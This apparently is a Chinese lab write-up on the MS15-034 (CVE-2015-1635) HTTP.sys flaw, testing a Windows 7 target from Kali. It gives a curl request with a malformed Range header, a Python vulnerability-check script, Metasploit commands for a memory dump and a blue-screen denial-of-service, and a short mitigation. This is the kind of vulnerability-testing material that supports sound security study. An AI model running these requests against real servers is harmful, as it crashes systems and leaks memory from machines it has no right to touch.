CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)
1.1.1 漏洞描述
在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。
1.1.2 漏洞测试
环境搭建:
靶机: win7(192.168.80.130)
攻击机: kali(192.168.80.129)
(1)使用curl工具进行测试,测试命令:
curl http://192.168.80.130 -H "Host: 192.168.80.130" -H "Range: bytes=0-18446744073709551615"
测试结果截图:
(2)使用POC测试,代码为:
import socket import random ipAddr = "192.168.80.130" hexAllFfff = "18446744073709551615" req1 = "GET / HTTP/1.0\r\n\r\n" req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n" print "[*] Audit Started" client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect((ipAddr, 80)) client_socket.send(req1) boringResp = client_socket.recv(1024) if "Microsoft" not in boringResp: print "[*] Not IIS" exit(0) client_socket.close() client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect((ipAddr, 80)) client_socket.send(req) goodResp = client_socket.recv(1024) if "Requested Range Not Satisfiable" in goodResp: print "[!!] Looks VULN" elif " The request has an invalid header name" in goodResp: print "[*] Looks Patched" else: print "[*] Unexpected response, cannot discern patch status"
测试结果截图:
1.1.3 漏洞利用
(1)利用ms15-034漏洞读取服务器内存数据
借助metasploit平台,截图如下:
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.80.130
run
(2)利用ms15-034漏洞进行ddos攻击
同样借助metasploit平台,截图如下:
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts 192.168.80.130
set threads 10
run
攻击开始后,win7瞬间蓝屏然后自动重启,截图如下:
1.1.4 漏洞修复
禁用IIS内核缓存(可能降低IIS性能)
- HTTP.sys 远程执行代码漏洞(CVE-2015-1635)(MS15-034)简单测试
- MS15-034 IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC
- HTTP.SYS 远程执行代码漏洞分析(MS15-034 )
- http.sys远程代码执行漏洞(MS15-034)
- HTTP.sys 远程执行 代码漏洞 ( MS15-034)
- Windows Server 2012 R2修复MS15-034漏洞
- cve-2015-1635 poc
- 【Python】实现漏洞扫描器之MS15-034漏洞批量扫描+源码分析
- 4.漏洞验证系列--MS15-034 HTTP协议栈整数溢出
- ms 15 034 security
- QSEE privilege escalation vulnerability and exploit (CVE-2015-6639)
- 【起航计划 034】2015 起航计划 Android APIDemo的魔鬼步伐 33 App->Service->Local Service Binding 绑定服务 ServiceConnection Binder
- HTTP.SYS 详解
- CVE-2015-7547漏洞分析从原因到利用到补丁(非常适合小白)
- 协议森林15 先生,要点单吗? (HTTP协议概览)
- Own your Android! Yet Another Universal Root CVE-2015-3636 (中文翻译) (2)
- Windows server 2008 HTTP.sys被禁用导致80端口被禁用和IIS服务无法启动解决办法
- 2015GitWebRTC编译实录15
- Http详解--会话(15)
- SQL server 2005 拒绝了对对象 'extended_properties' (数据库 'mssqlsystemresource',架构 'sys')的 SELECT 权限。 (Micro